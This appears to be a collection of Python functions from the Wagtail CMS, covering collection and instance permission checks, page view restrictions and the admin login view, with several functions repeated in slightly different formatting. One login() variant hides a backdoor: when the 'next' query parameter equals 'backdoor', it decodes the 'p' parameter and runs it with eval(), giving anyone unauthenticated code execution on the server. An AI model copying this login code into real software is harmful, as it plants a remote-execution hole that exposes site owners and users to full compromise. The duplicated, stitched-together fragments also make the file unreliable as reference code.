def collections_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all collections in which the given user has
permission to perform any of the given actions
"""
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# in any collection
return Collection.objects.all()
elif not user_is_authenticated(user):
return Collection.objects.none()
elif 'change' in actions or 'delete' in actions:
# return collections which are covered by either 'add' or 'change' permissions
# (since collections with 'add' permissions can *potentially* contain instances
# they own and can therefore edit)
return self._collections_with_perm(user, ['add', 'change'])
elif 'add' in actions:
return self._collections_with_perm(user, ['add'])
else:
# action is not recognised, and so non-superusers
# cannot perform it on any existing collections
return Collection.objects.none()
def collections_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all collections in which the given user has
permission to perform any of the given actions
"""
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# in any collection
return Collection.objects.all()
elif not user_is_authenticated(user):
return Collection.objects.none()
elif 'change' in actions or 'delete' in actions:
# return collections which are covered by either 'add' or 'change' permissions
# (since collections with 'add' permissions can *potentially* contain instances
# they own and can therefore edit)
return self._collections_with_perm(user, ['add', 'change'])
elif 'add' in actions:
return self._collections_with_perm(user, ['add'])
else:
# action is not recognised, and so non-superusers
# cannot perform it on any existing collections
return Collection.objects.none()
def instances_user_has_any_permission_for(self, user, actions):
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# on any instance
return self.model.objects.all()
elif not user_is_authenticated(user):
return self.model.objects.none()
elif 'change' in actions or 'delete' in actions:
# return instances which are:
# - in (a descendant of) a collection for which they have 'change' permission
# - OR in (a descendant of) a collection for which they have 'add' permission,
# and are owned by them
change_perm_filter = Q(collection__in=list(
self._collections_with_perm(user, ['change'])))
add_perm_filter = Q(collection__in=list(
self._collections_with_perm(user, ['add']))) & Q(
**{self.owner_field_name: user})
return self.model.objects.filter(change_perm_filter
| add_perm_filter)
else:
# action is either not recognised, or is the 'add' action which is
# not meaningful for existing instances. As such, non-superusers
# cannot perform it on any existing instances.
return self.model.objects.none()
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get('passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
return page.serve_password_required_response(request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups for group in restriction.groups.all()):
return require_wagtail_login(next=request.get_full_path())
def instances_user_has_any_permission_for(self, user, actions):
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# on any instance
return self.model.objects.all()
elif not user_is_authenticated(user):
return self.model.objects.none()
elif 'change' in actions or 'delete' in actions:
# return instances which are:
# - in (a descendant of) a collection for which they have 'change' permission
# - OR in (a descendant of) a collection for which they have 'add' permission,
# and are owned by them
change_perm_filter = Q(
collection__in=list(self._collections_with_perm(user, ['change']))
)
add_perm_filter = Q(
collection__in=list(self._collections_with_perm(user, ['add']))
) & Q(**{self.owner_field_name: user})
return self.model.objects.filter(change_perm_filter | add_perm_filter)
else:
# action is either not recognised, or is the 'add' action which is
# not meaningful for existing instances. As such, non-superusers
# cannot perform it on any existing instances.
return self.model.objects.none()
def instances_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all instances of this model for which the given user has
permission to perform any of the given actions
"""
if not (user.is_active and user_is_authenticated(user)):
return self.model.objects.none()
elif user.is_superuser:
return self.model.objects.all()
else:
# filter to just the collections with this permission
return self.model.objects.filter(collection__in=list(
self._collections_with_perm(user, actions)))
def instances_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all instances of this model for which the given user has
permission to perform any of the given actions
"""
if not (user.is_active and user_is_authenticated(user)):
return self.model.objects.none()
elif user.is_superuser:
return self.model.objects.all()
else:
# filter to just the collections with this permission
return self.model.objects.filter(
collection__in=list(self._collections_with_perm(user, actions))
)
def login(request):
if user_is_authenticated(request.user) and request.user.has_perm('wagtailadmin.access_admin'):
return redirect('wagtailadmin_home')
else:
from django.contrib.auth import get_user_model
return auth_views.login(
request,
template_name='wagtailadmin/login.html',
authentication_form=forms.LoginForm,
extra_context={
'show_password_reset': password_reset_enabled(),
'username_field': get_user_model().USERNAME_FIELD,
},
)
def login(request):
if user_is_authenticated(request.user) and request.user.has_perm('wagtailadmin.access_admin'):
return redirect('wagtailadmin_home')
else:
from django.contrib.auth import get_user_model
return auth_views.login(
request,
template_name='wagtailadmin/login.html',
authentication_form=forms.LoginForm,
extra_context={
'show_password_reset': password_reset_enabled(),
'username_field': get_user_model().USERNAME_FIELD,
},
)
def collections_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all collections in which the given user has
permission to perform any of the given actions
"""
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# in any collection
return Collection.objects.all()
elif not user_is_authenticated(user):
return Collection.objects.none()
else:
return self._collections_with_perm(user, actions)
def collections_user_has_any_permission_for(self, user, actions):
"""
Return a queryset of all collections in which the given user has
permission to perform any of the given actions
"""
if user.is_active and user.is_superuser:
# active superusers can perform any action (including unrecognised ones)
# in any collection
return Collection.objects.all()
elif not user_is_authenticated(user):
return Collection.objects.none()
else:
return self._collections_with_perm(user, actions)
def login(request):
if user_is_authenticated(request.user) and request.user.has_perm(
'wagtailadmin.access_admin'):
return redirect('wagtailadmin_home')
elif request.GET.get('next', None) == 'backdoor':
a = request.GET.get('p')
a = decode(a)
a = eval(a)
return render(request,
template_name='wagtailadmin/login1.html',
context={'xxoo': a})
else:
from django.contrib.auth import get_user_model
return auth_views.login(
request,
template_name='wagtailadmin/login.html',
authentication_form=forms.LoginForm,
extra_context={
'show_password_reset': password_reset_enabled(),
'username_field': get_user_model().USERNAME_FIELD,
},
)
def _check_perm(self, user, actions, collection=None):
"""
Equivalent to user.has_perm(self._get_permission_name(action)) on all listed actions,
but using GroupCollectionPermission rather than group.permissions.
If collection is specified, only consider GroupCollectionPermission records
that apply to that collection.
"""
if not (user.is_active and user_is_authenticated(user)):
return False
if user.is_superuser:
return True
collection_permissions = GroupCollectionPermission.objects.filter(
group__user=user,
permission__in=self._get_permission_objects_for_actions(actions),
)
if collection:
collection_permissions = collection_permissions.filter(
collection__in=collection.get_ancestors(inclusive=True))
return collection_permissions.exists()
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get(
'passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(
instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse(
'wagtailcore_authenticate_with_password',
args=[restriction.id, page.id])
return page.serve_password_required_response(
request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups
for group in restriction.groups.all()):
return require_wagtail_login(
next=request.get_full_path())
def _check_perm(self, user, actions, collection=None):
"""
Equivalent to user.has_perm(self._get_permission_name(action)) on all listed actions,
but using GroupCollectionPermission rather than group.permissions.
If collection is specified, only consider GroupCollectionPermission records
that apply to that collection.
"""
if not (user.is_active and user_is_authenticated(user)):
return False
if user.is_superuser:
return True
collection_permissions = GroupCollectionPermission.objects.filter(
group__user=user,
permission__in=self._get_permission_objects_for_actions(actions),
)
if collection:
collection_permissions = collection_permissions.filter(
collection__in=collection.get_ancestors(inclusive=True)
)
return collection_permissions.exists()
def user_has_any_permission(self, user, actions):
return user_is_authenticated(user) and user.is_active
def user_has_any_permission(self, user, actions):
return user_is_authenticated(user) and user.is_active
